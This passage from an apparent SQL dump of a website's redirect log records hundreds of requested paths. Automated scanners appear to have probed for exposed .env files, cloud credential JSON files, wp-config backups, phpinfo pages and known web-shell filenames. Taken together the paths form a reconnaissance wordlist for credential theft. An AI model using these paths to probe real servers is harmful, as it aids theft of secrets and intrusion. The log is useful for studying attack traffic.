00:00:00',301),(64853,'http://3s-technologies.com.tr/tr/additionalconfiguration.php',NULL,'','',1,0,'2026-05-15 13:23:04','0000-00-00 00:00:00',301),(64854,'http://3s-technologies.com.tr/tr/config_test.php',NULL,'','',1,0,'2026-05-15 13:23:05','0000-00-00 00:00:00',301),(64855,'http://3s-technologies.com.tr/tr/dbg.php',NULL,'','',1,0,'2026-05-15 13:23:06','0000-00-00 00:00:00',301),(64856,'http://3s-technologies.com.tr/tr/index_dev.php',NULL,'','',1,0,'2026-05-15 13:23:07','0000-00-00 00:00:00',301),(64857,'http://3s-technologies.com.tr/tr/busifacade.php',NULL,'','',1,0,'2026-05-15 13:23:10','0000-00-00 00:00:00',301),(64858,'http://3s-technologies.com.tr/tr/groupon.php',NULL,'','',1,0,'2026-05-15 13:23:11','0000-00-00 00:00:00',301),(64859,'http://3s-technologies.com.tr/tr/wp-config-prod.php',NULL,'','',1,0,'2026-05-15 13:23:11','0000-00-00 00:00:00',301),(64860,'http://3s-technologies.com.tr/tr/configuration.file.php',NULL,'','',1,0,'2026-05-15 13:23:13','0000-00-00 00:00:00',301),(64861,'http://3s-technologies.com.tr/tr/database.php.save',NULL,'','',1,0,'2026-05-15 13:23:13','0000-00-00 00:00:00',301),(64862,'http://3s-technologies.com.tr/tr/server_details.php',NULL,'','',1,0,'2026-05-15 13:23:14','0000-00-00 00:00:00',301),(64863,'http://3s-technologies.com.tr/tr/includeswp-conflg.php',NULL,'','',1,0,'2026-05-15 13:23:16','0000-00-00 00:00:00',301),(64864,'http://3s-technologies.com.tr/tr/show_info.php',NULL,'','',1,0,'2026-05-15 13:23:18','0000-00-00 00:00:00',301),(64865,'http://3s-technologies.com.tr/tr/~info.php',NULL,'','',1,0,'2026-05-15 13:23:19','0000-00-00 00:00:00',301),(64866,'http://3s-technologies.com.tr/tr/config.php.save',NULL,'','',1,0,'2026-05-15 13:23:21','0000-00-00 00:00:00',301),(64867,'http://3s-technologies.com.tr/tr/sparkpost.php',NULL,'','',1,0,'2026-05-15 13:23:22','0000-00-00 00:00:00',301),(64868,'http://3s-technologies.com.tr/tr/backup-wp-config.php',NULL,'','',1,0,'2026-05-15 13:23:23','0000-00-00 00:00:00',301),(64869,'http://3s-technologies.com.tr/tr/wp-config.php.saved',NULL,'','',1,0,'2026-05-15 13:23:24','0000-00-00 00:00:00',301),(64870,'http://3s-technologies.com.tr/tr/php-info-page.php',NULL,'','',1,0,'2026-05-15 13:23:25','0000-00-00 00:00:00',301),(64871,'http://3s-technologies.com.tr/tr/php-release.php',NULL,'','',1,0,'2026-05-15 13:23:27','0000-00-00 00:00:00',301),(64872,'http://3s-technologies.com.tr/tr/servercheck.php',NULL,'','',1,0,'2026-05-15 13:23:27','0000-00-00 00:00:00',301),(64873,'http://3s-technologies.com.tr/tr/diagnostics.php',NULL,'','',1,0,'2026-05-15 13:23:28','0000-00-00 00:00:00',301),(64874,'http://3s-technologies.com.tr/tr/system-status.php',NULL,'','',1,0,'2026-05-15 13:23:31','0000-00-00 00:00:00',301),(64875,'http://3s-technologies.com.tr/tr/pdo.php',NULL,'','',1,0,'2026-05-15 13:23:32','0000-00-00 00:00:00',301),(64876,'http://3s-technologies.com.tr/tr/time_zone.php',NULL,'','',1,0,'2026-05-15 13:23:33','0000-00-00 00:00:00',301),(64877,'http://3s-technologies.com.tr/tr/application.config.php',NULL,'','',1,0,'2026-05-15 13:23:38','0000-00-00 00:00:00',301),(64878,'http://3s-technologies.com.tr/tr/host-phpinfo.php',NULL,'','',1,0,'2026-05-15 13:23:38','0000-00-00 00:00:00',301),(64879,'http://3s-technologies.com.tr/tr/glass.php',NULL,'','',1,0,'2026-05-15 13:23:40','0000-00-00 00:00:00',301),(64880,'http://3s-technologies.com.tr/tr/php-benchmark.php',NULL,'','',1,0,'2026-05-15 13:23:44','0000-00-00 00:00:00',301),(64881,'http://3s-technologies.com.tr/tr/local-info.php',NULL,'','',1,0,'2026-05-15 13:23:45','0000-00-00 00:00:00',301),(64882,'http://3s-technologies.com.tr/tr/phpinfo001.php',NULL,'','',1,0,'2026-05-15 13:23:46','0000-00-00 00:00:00',301),(64883,'http://3s-technologies.com.tr/tr/constants.php',NULL,'','',1,0,'2026-05-15 13:23:47','0000-00-00 00:00:00',301),(64884,'http://3s-technologies.com.tr/tr/pip.php',NULL,'','',1,0,'2026-05-15 13:23:48','0000-00-00 00:00:00',301),(64885,'http://3s-technologies.com.tr/tr/apache2.php',NULL,'','',1,0,'2026-05-15 13:23:50','0000-00-00 00:00:00',301),(64886,'http://3s-technologies.com.tr/tr/.env.development.php',NULL,'','',1,0,'2026-05-15 13:23:51','0000-00-00 00:00:00',301),(64887,'http://3s-technologies.com.tr/tr/diagnose-php.php',NULL,'','',1,0,'2026-05-15 13:23:53','0000-00-00 00:00:00',301),(64888,'http://3s-technologies.com.tr/tr/db-error.php',NULL,'','',1,0,'2026-05-15 13:23:55','0000-00-00 00:00:00',301),(64889,'http://3s-technologies.com.tr/tr/test-php-info.php',NULL,'','',1,0,'2026-05-15 13:23:57','0000-00-00 00:00:00',301),(64890,'https://3s-technologies.com.tr/en/wp-content/plugins/smtp-mailer/readme.txt',NULL,'https://3s-technologies.com.tr/wp-login.php','',1,0,'2026-05-16 23:00:53','0000-00-00 00:00:00',301),(64891,'http://mail.3s-technologies.com.tr/tr/wp-test.php',NULL,'','',2,0,'2026-05-17 00:54:26','0000-00-00 00:00:00',301),(64892,'http://mail.3s-technologies.com.tr/tr/like.php',NULL,'','',3,0,'2026-05-17 00:54:27','0000-00-00 00:00:00',301),(64893,'http://mail.3s-technologies.com.tr/tr/wp-indx.php',NULL,'','',2,0,'2026-05-17 00:54:29','0000-00-00 00:00:00',301),(64894,'http://mail.3s-technologies.com.tr/tr/wp-link-spm.php',NULL,'','',2,0,'2026-05-17 00:54:30','0000-00-00 00:00:00',301),(64895,'http://mail.3s-technologies.com.tr/tr/wp-link-snpm.php',NULL,'','',2,0,'2026-05-17 00:54:31','0000-00-00 00:00:00',301),(64896,'https://3s-technologies.com.tr/tr/.env.preprod',NULL,'','',6,0,'2026-05-17 06:48:37','0000-00-00 00:00:00',301),(64897,'https://3s-technologies.com.tr/tr/.env.uat',NULL,'','',6,0,'2026-05-17 06:48:38','0000-00-00 00:00:00',301),(64898,'https://3s-technologies.com.tr/tr/.env.swp',NULL,'','',6,0,'2026-05-17 06:48:39','0000-00-00 00:00:00',301),(64899,'https://3s-technologies.com.tr/tr/server/.env',NULL,'','',6,0,'2026-05-17 06:48:48','0000-00-00 00:00:00',301),(64900,'https://3s-technologies.com.tr/tr/core/database/.env',NULL,'','',2,0,'2026-05-17 06:48:52','0000-00-00 00:00:00',301),(64901,'https://3s-technologies.com.tr/tr/private/.env',NULL,'','',6,0,'2026-05-17 06:48:54','0000-00-00 00:00:00',301),(64902,'https://3s-technologies.com.tr/tr/current/.env',NULL,'','',6,0,'2026-05-17 06:48:55','0000-00-00 00:00:00',301),(64903,'https://3s-technologies.com.tr/tr/release/.env',NULL,'','',6,0,'2026-05-17 06:48:56','0000-00-00 00:00:00',301),(64904,'https://3s-technologies.com.tr/tr/releases/.env',NULL,'','',6,0,'2026-05-17 06:48:57','0000-00-00 00:00:00',301),(64905,'https://3s-technologies.com.tr/tr/shared/.env',NULL,'','',6,0,'2026-05-17 06:48:58','0000-00-00 00:00:00',301),(64906,'https://3s-technologies.com.tr/tr/deploy/.env',NULL,'','',6,0,'2026-05-17 06:48:59','0000-00-00 00:00:00',301),(64907,'https://3s-technologies.com.tr/tr/build/.env',NULL,'','',6,0,'2026-05-17 06:48:59','0000-00-00 00:00:00',301),(64908,'https://3s-technologies.com.tr/tr/dist/.env',NULL,'','',6,0,'2026-05-17 06:49:00','0000-00-00 00:00:00',301),(64909,'https://3s-technologies.com.tr/tr/htdocs/.env',NULL,'','',6,0,'2026-05-17 06:49:02','0000-00-00 00:00:00',301),(64910,'https://3s-technologies.com.tr/tr/live/.env',NULL,'','',6,0,'2026-05-17 06:49:04','0000-00-00 00:00:00',301),(64911,'https://3s-technologies.com.tr/tr/prod/.env',NULL,'','',6,0,'2026-05-17 06:49:05','0000-00-00 00:00:00',301),(64912,'https://3s-technologies.com.tr/tr/symfony/.env',NULL,'','',6,0,'2026-05-17 06:49:09','0000-00-00 00:00:00',301),(64913,'https://3s-technologies.com.tr/tr/wordpress/.env',NULL,'','',6,0,'2026-05-17 06:49:10','0000-00-00 00:00:00',301),(64914,'https://3s-technologies.com.tr/tr/wp/.env',NULL,'','',6,0,'2026-05-17 06:49:11','0000-00-00 00:00:00',301),(64915,'https://3s-technologies.com.tr/tr/cms/.env',NULL,'','',6,0,'2026-05-17 06:49:12','0000-00-00 00:00:00',301),(64916,'https://3s-technologies.com.tr/tr/drupal/.env',NULL,'','',6,0,'2026-05-17 06:49:13','0000-00-00 00:00:00',301),(64917,'https://3s-technologies.com.tr/tr/joomla/.env',NULL,'','',6,0,'2026-05-17 06:49:13','0000-00-00 00:00:00',301),(64918,'https://3s-technologies.com.tr/tr/magento/.env',NULL,'','',6,0,'2026-05-17 06:49:14','0000-00-00 00:00:00',301),(64919,'https://3s-technologies.com.tr/tr/shopify/.env',NULL,'','',6,0,'2026-05-17 06:49:15','0000-00-00 00:00:00',301),(64920,'https://3s-technologies.com.tr/tr/prestashop/.env',NULL,'','',6,0,'2026-05-17 06:49:16','0000-00-00 00:00:00',301),(64921,'https://3s-technologies.com.tr/tr/v1/.env',NULL,'','',6,0,'2026-05-17 06:49:17','0000-00-00 00:00:00',301),(64922,'https://3s-technologies.com.tr/tr/v3/.env',NULL,'','',6,0,'2026-05-17 06:49:18','0000-00-00 00:00:00',301),(64923,'https://3s-technologies.com.tr/tr/api/v1/.env',NULL,'','',6,0,'2026-05-17 06:49:19','0000-00-00 00:00:00',301),(64924,'https://3s-technologies.com.tr/tr/api/v2/.env',NULL,'','',6,0,'2026-05-17 06:49:20','0000-00-00 00:00:00',301),(64925,'https://3s-technologies.com.tr/tr/rest/.env',NULL,'','',6,0,'2026-05-17 06:49:21','0000-00-00 00:00:00',301),(64926,'https://3s-technologies.com.tr/tr/graphql/.env',NULL,'','',6,0,'2026-05-17 06:49:22','0000-00-00 00:00:00',301),(64927,'https://3s-technologies.com.tr/tr/gateway/.env',NULL,'','',6,0,'2026-05-17 06:49:23','0000-00-00 00:00:00',301),(64928,'https://3s-technologies.com.tr/tr/microservice/.env',NULL,'','',6,0,'2026-05-17 06:49:24','0000-00-00 00:00:00',301),(64929,'https://3s-technologies.com.tr/tr/service/.env',NULL,'','',6,0,'2026-05-17 06:49:25','0000-00-00 00:00:00',301),(64930,'https://3s-technologies.com.tr/tr/resources/.env',NULL,'','',6,0,'2026-05-17 06:49:28','0000-00-00 00:00:00',301),(64931,'https://3s-technologies.com.tr/tr/internal/.env',NULL,'','',6,0,'2026-05-17 06:49:31','0000-00-00 00:00:00',301),(64932,'https://3s-technologies.com.tr/tr/tools/.env',NULL,'','',6,0,'2026-05-17 06:49:32','0000-00-00 00:00:00',301),(64933,'https://3s-technologies.com.tr/tr/scripts/.env',NULL,'','',6,0,'2026-05-17 06:49:33','0000-00-00 00:00:00',301),(64934,'https://3s-technologies.com.tr/tr/panel/.env',NULL,'','',6,0,'2026-05-17 06:49:35','0000-00-00 00:00:00',301),(64935,'https://3s-technologies.com.tr/tr/erp/.env',NULL,'','',6,0,'2026-05-17 06:49:37','0000-00-00 00:00:00',301),(64936,'https://3s-technologies.com.tr/tr/store/.env',NULL,'','',5,0,'2026-05-17 06:49:39','0000-00-00 00:00:00',301),(64937,'https://3s-technologies.com.tr/tr/client/.env',NULL,'','',6,0,'2026-05-17 06:49:41','0000-00-00 00:00:00',301),(64938,'https://3s-technologies.com.tr/tr/node/.env',NULL,'','',6,0,'2026-05-17 06:49:42','0000-00-00 00:00:00',301),(64939,'https://3s-technologies.com.tr/tr/express/.env',NULL,'','',6,0,'2026-05-17 06:49:43','0000-00-00 00:00:00',301),(64940,'https://3s-technologies.com.tr/tr/next/.env',NULL,'','',6,0,'2026-05-17 06:49:44','0000-00-00 00:00:00',301),(64941,'https://3s-technologies.com.tr/tr/nuxt/.env',NULL,'','',6,0,'2026-05-17 06:49:45','0000-00-00 00:00:00',301),(64942,'https://3s-technologies.com.tr/tr/nest/.env',NULL,'','',6,0,'2026-05-17 06:49:46','0000-00-00 00:00:00',301),(64943,'https://3s-technologies.com.tr/tr/backups/.env',NULL,'','',6,0,'2026-05-17 06:49:48','0000-00-00 00:00:00',301),(64944,'https://3s-technologies.com.tr/tr/tmp/.env',NULL,'','',6,0,'2026-05-17 06:49:49','0000-00-00 00:00:00',301),(64945,'https://3s-technologies.com.tr/tr/temp/.env',NULL,'','',6,0,'2026-05-17 06:49:50','0000-00-00 00:00:00',301),(64946,'https://3s-technologies.com.tr/en/psnlink/.env',NULL,'','',6,0,'2026-05-17 06:49:54','0000-00-00 00:00:00',301),(64947,'https://3s-technologies.com.tr/en/exapi/.env',NULL,'','',6,0,'2026-05-17 06:49:55','0000-00-00 00:00:00',301),(64948,'https://3s-technologies.com.tr/en/sitemaps/.env',NULL,'','',6,0,'2026-05-17 06:49:56','0000-00-00 00:00:00',301),(64949,'https://3s-technologies.com.tr/en/mailer/.env',NULL,'','',6,0,'2026-05-17 06:49:57','0000-00-00 00:00:00',301),(64950,'https://3s-technologies.com.tr/en/mail/.env',NULL,'','',6,0,'2026-05-17 06:49:58','0000-00-00 00:00:00',301),(64951,'https://3s-technologies.com.tr/en/email/.env',NULL,'','',6,0,'2026-05-17 06:49:59','0000-00-00 00:00:00',301),(64952,'https://3s-technologies.com.tr/en/smtp/.env',NULL,'','',6,0,'2026-05-17 06:50:00','0000-00-00 00:00:00',301),(64953,'https://3s-technologies.com.tr/en/mailing/.env',NULL,'','',6,0,'2026-05-17 06:50:00','0000-00-00 00:00:00',301),(64954,'https://3s-technologies.com.tr/en/notifications/.env',NULL,'','',6,0,'2026-05-17 06:50:01','0000-00-00 00:00:00',301),(64955,'https://3s-technologies.com.tr/en/notify/.env',NULL,'','',6,0,'2026-05-17 06:50:02','0000-00-00 00:00:00',301),(64956,'https://3s-technologies.com.tr/en/sender/.env',NULL,'','',6,0,'2026-05-17 06:50:03','0000-00-00 00:00:00',301),(64957,'https://3s-technologies.com.tr/en/campaign/.env',NULL,'','',6,0,'2026-05-17 06:50:04','0000-00-00 00:00:00',301),(64958,'https://3s-technologies.com.tr/en/newsletter/.env',NULL,'','',6,0,'2026-05-17 06:50:05','0000-00-00 00:00:00',301),(64959,'https://3s-technologies.com.tr/en/ses/.env',NULL,'','',6,0,'2026-05-17 06:50:06','0000-00-00 00:00:00',301),(64960,'https://3s-technologies.com.tr/en/sendgrid/.env',NULL,'','',6,0,'2026-05-17 06:50:07','0000-00-00 00:00:00',301),(64961,'https://3s-technologies.com.tr/en/sparkpost/.env',NULL,'','',6,0,'2026-05-17 06:50:08','0000-00-00 00:00:00',301),(64962,'https://3s-technologies.com.tr/en/postmark/.env',NULL,'','',6,0,'2026-05-17 06:50:09','0000-00-00 00:00:00',301),(64963,'https://3s-technologies.com.tr/en/mailgun/.env',NULL,'','',6,0,'2026-05-17 06:50:10','0000-00-00 00:00:00',301),(64964,'https://3s-technologies.com.tr/en/mandrill/.env',NULL,'','',6,0,'2026-05-17 06:50:10','0000-00-00 00:00:00',301),(64965,'https://3s-technologies.com.tr/en/mailjet/.env',NULL,'','',6,0,'2026-05-17 06:50:11','0000-00-00 00:00:00',301),(64966,'https://3s-technologies.com.tr/en/brevo/.env',NULL,'','',6,0,'2026-05-17 06:50:12','0000-00-00 00:00:00',301),(64967,'https://3s-technologies.com.tr/en/transactional/.env',NULL,'','',6,0,'2026-05-17 06:50:13','0000-00-00 00:00:00',301),(64968,'https://3s-technologies.com.tr/en/bulk/.env',NULL,'','',6,0,'2026-05-17 06:50:14','0000-00-00 00:00:00',301),(64969,'https://3s-technologies.com.tr/en/debug.php',NULL,'','',4,0,'2026-05-17 06:50:23','0000-00-00 00:00:00',301),(64970,'https://3s-technologies.com.tr/en/tmp/phpinfo.php',NULL,'','',4,0,'2026-05-17 06:50:27','0000-00-00 00:00:00',301),(64971,'https://3s-technologies.com.tr/en/public/phpinfo.php',NULL,'','',4,0,'2026-05-17 06:50:29','0000-00-00 00:00:00',301),(64972,'https://3s-technologies.com.tr/en/info',NULL,'','',4,0,'2026-05-17 06:50:30','0000-00-00 00:00:00',301),(64973,'https://3s-technologies.com.tr/en/_phpinfo.php',NULL,'','',4,0,'2026-05-17 06:50:33','0000-00-00 00:00:00',301),(64974,'https://3s-technologies.com.tr/en/server-info.php',NULL,'','',4,0,'2026-05-17 06:50:35','0000-00-00 00:00:00',301),(64975,'https://3s-technologies.com.tr/en/server-status.php',NULL,'','',4,0,'2026-05-17 06:50:36','0000-00-00 00:00:00',301),(64976,'https://3s-technologies.com.tr/en/mail/phpinfo.php',NULL,'','',4,0,'2026-05-17 06:50:39','0000-00-00 00:00:00',301),(64977,'https://3s-technologies.com.tr/en/cpanel/phpinfo.php',NULL,'','',4,0,'2026-05-17 06:50:40','0000-00-00 00:00:00',301),(64978,'https://3s-technologies.com.tr/en/hosting/phpinfo.php',NULL,'','',4,0,'2026-05-17 06:50:41','0000-00-00 00:00:00',301),(64979,'https://3s-technologies.com.tr/en/smtp/phpinfo.php',NULL,'','',4,0,'2026-05-17 06:50:43','0000-00-00 00:00:00',301),(64980,'http://3s-technologies.com.tr/tr/pha.php',NULL,'','',1,0,'2026-05-17 07:16:53','0000-00-00 00:00:00',301),(64981,'http://3s-technologies.com.tr/tr/c55cdler.php',NULL,'','',4,0,'2026-05-17 07:16:54','0000-00-00 00:00:00',301),(64982,'http://3s-technologies.com.tr/tr/guiler.php',NULL,'','',1,0,'2026-05-17 07:16:55','0000-00-00 00:00:00',301),(64983,'http://3s-technologies.com.tr/tr/alfa403.php',NULL,'','',4,0,'2026-05-17 07:17:01','0000-00-00 00:00:00',301),(64984,'http://3s-technologies.com.tr/tr/yenifm.php',NULL,'','',1,0,'2026-05-17 07:17:01','0000-00-00 00:00:00',301),(64985,'http://3s-technologies.com.tr/tr/test11.php',NULL,'','',4,0,'2026-05-17 07:17:02','0000-00-00 00:00:00',301),(64986,'http://3s-technologies.com.tr/tr/wp-widget.php?p=',NULL,'','',1,0,'2026-05-17 07:17:03','0000-00-00 00:00:00',301),(64987,'http://3s-technologies.com.tr/tr/mih.php',NULL,'','',1,0,'2026-05-17 07:17:07','0000-00-00 00:00:00',301),(64988,'http://3s-technologies.com.tr/tr/koala.php',NULL,'','',4,0,'2026-05-17 07:17:09','0000-00-00 00:00:00',301),(64989,'http://3s-technologies.com.tr/tr/0d.php',NULL,'','',1,0,'2026-05-17 07:17:12','0000-00-00 00:00:00',301),(64990,'http://3s-technologies.com.tr/tr/oiqcxuo.php',NULL,'','',1,0,'2026-05-17 07:19:17','0000-00-00 00:00:00',301),(64991,'http://3s-technologies.com.tr/tr/xamp.php',NULL,'','',4,0,'2026-05-17 07:19:20','0000-00-00 00:00:00',301),(64992,'http://3s-technologies.com.tr/tr/ca3bhikvhgp.php',NULL,'','',4,0,'2026-05-17 07:19:20','0000-00-00 00:00:00',301),(64993,'http://3s-technologies.com.tr/tr/clas11.php',NULL,'','',4,0,'2026-05-17 07:19:21','0000-00-00 00:00:00',301),(64994,'https://3s-technologies.com.tr/en/serviceaccountkey.json',NULL,'https://3s-technologies.com.tr/serviceAccountKey.json','',3,0,'2026-05-18 03:22:18','0000-00-00 00:00:00',301),(64995,'https://3s-technologies.com.tr/en/service-account.json',NULL,'https://3s-technologies.com.tr/service-account.json','',6,0,'2026-05-18 03:22:18','0000-00-00 00:00:00',301),(64996,'https://3s-technologies.com.tr/en/firebase-service-account.json',NULL,'https://3s-technologies.com.tr/firebase-service-account.json','',3,0,'2026-05-18 03:22:19','0000-00-00 00:00:00',301),(64997,'https://3s-technologies.com.tr/en/credentials.json',NULL,'https://3s-technologies.com.tr/credentials.json','',6,0,'2026-05-18 03:22:19','0000-00-00 00:00:00',301),(64998,'https://3s-technologies.com.tr/en/google-service-account.json',NULL,'https://3s-technologies.com.tr/google-service-account.json','',5,0,'2026-05-18 03:22:19','0000-00-00 00:00:00',301),(64999,'https://3s-technologies.com.tr/en/app/.env',NULL,'https://3s-technologies.com.tr/app/.env','',3,0,'2026-05-18 03:22:19','0000-00-00 00:00:00',301),(65000,'https://3s-technologies.com.tr/en/.env.production.copy',NULL,'https://3s-technologies.com.tr/.env.production.copy','',2,0,'2026-05-18 03:22:27','0000-00-00 00:00:00',301),(65001,'https://3s-technologies.com.tr/en/.env.local.orig',NULL,'https://3s-technologies.com.tr/.env.local.orig','',2,0,'2026-05-18 03:22:29','0000-00-00 00:00:00',301),(65002,'https://3s-technologies.com.tr/en/.env.production.bak',NULL,'https://3s-technologies.com.tr/.env.production.bak','',2,0,'2026-05-18 03:22:29','0000-00-00 00:00:00',301),(65003,'https://3s-technologies.com.tr/en/.env.orig',NULL,'https://3s-technologies.com.tr/.env.orig','',2,0,'2026-05-18 03:22:29','0000-00-00 00:00:00',301),(65004,'https://3s-technologies.com.tr/en/.env.production.swp',NULL,'https://3s-technologies.com.tr/.env.production.swp','',2,0,'2026-05-18 03:22:29','0000-00-00 00:00:00',301),(65005,'https://3s-technologies.com.tr/en/.env.swp',NULL,'https://3s-technologies.com.tr/.env.swp','',2,0,'2026-05-18 03:22:29','0000-00-00 00:00:00',301),(65006,'https://3s-technologies.com.tr/en/.env.production.old',NULL,'https://3s-technologies.com.tr/.env.production.old','',2,0,'2026-05-18 03:22:29','0000-00-00 00:00:00',301),(65007,'https://3s-technologies.com.tr/en/.env.local.copy',NULL,'https://3s-technologies.com.tr/.env.local.copy','',2,0,'2026-05-18 03:22:29','0000-00-00 00:00:00',301),(65008,'https://3s-technologies.com.tr/en/.env.local.bak',NULL,'https://3s-technologies.com.tr/.env.local.bak','',2,0,'2026-05-18 03:22:30','0000-00-00 00:00:00',301),(65009,'https://3s-technologies.com.tr/en/.env.save',NULL,'https://3s-technologies.com.tr/.env.save','',2,0,'2026-05-18 03:22:30','0000-00-00 00:00:00',301),(65010,'https://3s-technologies.com.tr/en/.env.local.backup',NULL,'https://3s-technologies.com.tr/.env.local.backup','',2,0,'2026-05-18 03:22:30','0000-00-00 00:00:00',301),(65011,'https://3s-technologies.com.tr/en/.env.production~',NULL,'https://3s-technologies.com.tr/.env.production~','',2,0,'2026-05-18 03:22:30','0000-00-00 00:00:00',301),(65012,'https://3s-technologies.com.tr/en/.env~',NULL,'https://3s-technologies.com.tr/.env~','',2,0,'2026-05-18 03:22:30','0000-00-00 00:00:00',301),(65013,'https://3s-technologies.com.tr/en/.env.local.old',NULL,'https://3s-technologies.com.tr/.env.local.old','',2,0,'2026-05-18 03:22:31','0000-00-00 00:00:00',301),(65014,'https://3s-technologies.com.tr/en/.env.local.save',NULL,'https://3s-technologies.com.tr/.env.local.save','',2,0,'2026-05-18 03:22:31','0000-00-00 00:00:00',301),(65015,'https://3s-technologies.com.tr/en/.env.local~',NULL,'https://3s-technologies.com.tr/.env.local~','',2,0,'2026-05-18 03:22:31','0000-00-00 00:00:00',301),(65016,'https://3s-technologies.com.tr/en/.env.local.swp',NULL,'https://3s-technologies.com.tr/.env.local.swp','',2,0,'2026-05-18 03:22:32','0000-00-00 00:00:00',301),(65017,'https://3s-technologies.com.tr/en/.env.production.orig',NULL,'https://3s-technologies.com.tr/.env.production.orig','',2,0,'2026-05-18 03:22:32','0000-00-00 00:00:00',301),(65018,'https://3s-technologies.com.tr/en/.env.production.backup',NULL,'https://3s-technologies.com.tr/.env.production.backup','',2,0,'2026-05-18 03:22:32','0000-00-00 00:00:00',301),(65019,'https://3s-technologies.com.tr/en/.env.production.save',NULL,'https://3s-technologies.com.tr/.env.production.save','',2,0,'2026-05-18 03:22:32','0000-00-00 00:00:00',301),(65020,'https://3s-technologies.com.tr/en/.env.copy',NULL,'https://3s-technologies.com.tr/.env.copy','',2,0,'2026-05-18 03:22:32','0000-00-00 00:00:00',301),(65021,'https://3s-technologies.com.tr/tr/.env1',NULL,'','',4,0,'2026-05-18 20:18:46','0000-00-00 00:00:00',301),(65022,'https://3s-technologies.com.tr/tr/.env2',NULL,'','',4,0,'2026-05-18 20:18:47','0000-00-00 00:00:00',301),(65023,'https://3s-technologies.com.tr/tr/.env_copy',NULL,'','',4,0,'2026-05-18 20:18:48','0000-00-00 00:00:00',301),(65024,'https://3s-technologies.com.tr/tr/.env.txt',NULL,'','',4,0,'2026-05-18 20:18:49','0000-00-00 00:00:00',301),(65025,'https://3s-technologies.com.tr/tr/.env.json',NULL,'','',4,0,'2026-05-18 20:18:50','0000-00-00 00:00:00',301),(65026,'https://3s-technologies.com.tr/tr/.env.yaml',NULL,'','',4,0,'2026-05-18 20:18:51','0000-00-00 00:00:00',301),(65027,'https://3s-technologies.com.tr/tr/.env.yml',NULL,'','',4,0,'2026-05-18 20:18:51','0000-00-00 00:00:00',301),(65028,'https://3s-technologies.com.tr/tr/bootstrap/.env',NULL,'','',4,0,'2026-05-18 20:19:06','0000-00-00 00:00:00',301),(65029,'https://3s-technologies.com.tr/tr/var/www/.env',NULL,'','',4,0,'2026-05-18 20:19:09','0000-00-00 00:00:00',301),(65030,'https://3s-technologies.com.tr/tr/var/www/html/.env',NULL,'','',4,0,'2026-05-18 20:19:10','0000-00-00 00:00:00',301),(65031,'https://3s-technologies.com.tr/tr/opt/.env',NULL,'','',4,0,'2026-05-18 20:19:24','0000-00-00 00:00:00',301),(65032,'https://3s-technologies.com.tr/tr/codeigniter/.env',NULL,'','',4,0,'2026-05-18 20:19:33','0000-00-00 00:00:00',301),(65033,'https://3s-technologies.com.tr/tr/cakephp/.env',NULL,'','',4,0,'2026-05-18 20:19:34','0000-00-00 00:00:00',301),(65034,'https://3s-technologies.com.tr/tr/zend/.env',NULL,'','',4,0,'2026-05-18 20:19:34','0000-00-00 00:00:00',301),(65035,'https://3s-technologies.com.tr/tr/yii/.env',NULL,'','',4,0,'2026-05-18 20:19:35','0000-00-00 00:00:00',301),(65036,'https://3s-technologies.com.tr/tr/laravel5/.env',NULL,'','',4,0,'2026-05-18 20:19:36','0000-00-00 00:00:00',301),(65037,'https://3s-technologies.com.tr/tr/api/v3/.env',NULL,'','',4,0,'2026-05-18 20:19:45','0000-00-00 00:00:00',301),(65038,'https://3s-technologies.com.tr/tr/api/dev/.env',NULL,'','',4,0,'2026-05-18 20:19:46','0000-00-00 00:00:00',301),(65039,'https://3s-technologies.com.tr/tr/api/staging/.env',NULL,'','',4,0,'2026-05-18 20:19:47','0000-00-00 00:00:00',301),(65040,'https://3s-technologies.com.tr/tr/bin/.env',NULL,'','',4,0,'2026-05-18 20:19:54','0000-00-00 00:00:00',301),(65041,'https://3s-technologies.com.tr/tr/sbin/.env',NULL,'','',4,0,'2026-05-18 20:19:55','0000-00-00 00:00:00',301),(65042,'https://3s-technologies.com.tr/tr/admin-panel/.env',NULL,'','',4,0,'2026-05-18 20:20:05','0000-00-00 00:00:00',301),(65043,'https://3s-technologies.com.tr/tr/control-panel/.env',NULL,'','',4,0,'2026-05-18 20:20:06','0000-00-00 00:00:00',301),(65044,'https://3s-technologies.com.tr/tr/user-panel/.env',NULL,'','',4,0,'2026-05-18 20:20:07','0000-00-00 00:00:00',301),(65045,'https://3s-technologies.com.tr/tr/react/.env',NULL,'','',4,0,'2026-05-18 20:20:12','0000-00-00 00:00:00',301),(65046,'https://3s-technologies.com.tr/tr/vue/.env',NULL,'','',4,0,'2026-05-18 20:20:13','0000-00-00 00:00:00',301),(65047,'https://3s-technologies.com.tr/tr/angular/.env',NULL,'','',4,0,'2026-05-18 20:20:14','0000-00-00 00:00:00',301),(65048,'https://3s-technologies.com.tr/tr/svelte/.env',NULL,'','',4,0,'2026-05-18 20:20:15','0000-00-00 00:00:00',301),(65049,'https://3s-technologies.com.tr/tr/vite/.env',NULL,'','',4,0,'2026-05-18 20:20:16','0000-00-00 00:00:00',301),(65050,'https://3s-technologies.com.tr/en/.env.backup1',NULL,'','',4,0,'2026-05-18 20:20:28','0000-00-00 00:00:00',301),(65051,'https://3s-technologies.com.tr/en/.env.backup2',NULL,'','',4,0,'2026-05-18 20:20:29','0000-00-00 00:00:00',301),(65052,'https://3s-technologies.com.tr/en/logs/.env',NULL,'','',4,0,'2026-05-18 20:20:29','0000-00-00 00:00:00',301),(65053,'https://3s-technologies.com.tr/en/cache/.env',NULL,'','',4,0,'2026-05-18 20:20:30','0000-00-00 00:00:00',301),(65054,'https://3s-technologies.com.tr/en/aws/.env',NULL,'','',4,0,'2026-05-18 20:20:48','0000-00-00 00:00:00',301),(65055,'https://3s-technologies.com.tr/en/azure/.env',NULL,'','',4,0,'2026-05-18 20:20:49','0000-00-00 00:00:00',301),(65056,'https://3s-technologies.com.tr/en/gcp/.env',NULL,'','',4,0,'2026-05-18 20:20:50','0000-00-00 00:00:00',301),(65057,'https://3s-technologies.com.tr/en/cloud/.env',NULL,'','',4,0,'2026-05-18 20:20:51','0000-00-00 00:00:00',301),(65058,'https://3s-technologies.com.tr/en/infrastructure/.env',NULL,'','',4,0,'2026-05-18 20:20:52','0000-00-00 00:00:00',301),(65059,'https://3s-technologies.com.tr/en/docker/.env',NULL,'','',4,0,'2026-05-18 20:20:52','0000-00-00 00:00:00',301),(65060,'https://3s-technologies.com.tr/en/k8s/.env',NULL,'','',4,0,'2026-05-18 20:20:53','0000-00-00 00:00:00',301),(65061,'https://3s-technologies.com.tr/en/kubernetes/.env',NULL,'','',4,0,'2026-05-18 20:20:54','0000-00-00 00:00:00',301),(65062,'https://3s-technologies.com.tr/en/terraform/.env',NULL,'','',4,0,'2026-05-18 